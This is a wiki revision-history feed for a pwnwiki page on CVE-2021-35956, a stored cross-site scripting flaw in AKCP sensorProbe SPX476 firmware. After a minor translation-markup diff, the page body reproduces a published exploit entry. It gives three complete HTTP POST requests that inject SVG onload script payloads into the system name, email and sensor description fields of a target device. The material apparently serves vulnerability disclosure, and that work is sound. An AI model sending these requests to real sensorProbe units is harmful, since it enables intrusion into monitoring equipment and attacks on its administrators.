https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-35956_AKCP_sensorProbe_SPX476_XSS%E6%BC%8F%E6%B4%9E
CVE-2021-35956 AKCP sensorProbe SPX476 XSS漏洞 - Revision history
2026-04-05T06:43:49Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-35956_AKCP_sensorProbe_SPX476_XSS%E6%BC%8F%E6%B4%9E&diff=6175&oldid=prev
Pwnwiki: Marked this version for translation
2021-07-03T01:56:23Z
<p>Marked this version for translation</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 01:56, 3 July 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>==影響版本==</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==影響版本== <ins class="diffchange diffchange-inline"><!--T:1--></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Version: < SP480-20210624</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Version: < SP480-20210624</div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-6174:rev-6175 -->
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=CVE-2021-35956_AKCP_sensorProbe_SPX476_XSS%E6%BC%8F%E6%B4%9E&diff=6174&oldid=prev
Pwnwiki: Created page with "<languages /> <translate> ==影響版本== </translate> Version: < SP480-20210624 ==XSS== <pre> # Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XS..."
2021-07-03T01:55:51Z
<p>Created page with "<languages /> <translate> ==影響版本== </translate> Version: < SP480-20210624 ==XSS== <pre> # Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XS..."</p>
<p><b>New page</b></p><div><languages /><br />
<translate><br />
==影響版本==<br />
</translate><br />
Version: < SP480-20210624<br />
<br />
==XSS==<br />
<pre><br />
# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)<br />
# Date: 07-01-2021<br />
# Exploit Author: Tyler Butler<br />
# Vendor Homepage: https://www.akcp.com/<br />
# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/<br />
# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956<br />
# Version: < SP480-20210624<br />
# CVE: CVE-2021-35956<br />
<br />
# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.<br />
<br />
<br />
1) Stored Cross-Site Scripting via System Settings <br />
<br />
POST /system?time=32e004c941f912 HTTP/1.1<br />
Host: [target]<br />
Content-Length: 114<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
Origin: http://[target]<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Referer: http://[target]/system?time=32e004c941f912<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: en-US,en;q=0.9<br />
Connection: close<br />
<br />
_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save<br />
<br />
2) Stored Cross-Site Scripting via Email Settings <br />
<br />
POST /mail?time=32e004c941f912 HTTP/1.1<br />
Host: [target]<br />
Content-Length: 162<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
Origin: http://[target]<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Referer: http://[target]/mail?time=32e004c941f912<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: en-US,en;q=0.9<br />
Connection: close<br />
<br />
<br />
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save<br />
<br />
3) Stored Cross-Site Scripting via Sensor Description<br />
<br />
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1<br />
Host: [target]<br />
Content-Length: 55<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
Origin: http://[target]<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Referer: http://[target]/senswatr?index=0&time=32e004c941f912<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: en-US,en;q=0.9<br />
Cookie: CPCookie=sensors=400<br />
Connection: close<br />
<br />
_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save<br />
</pre></div>
Pwnwiki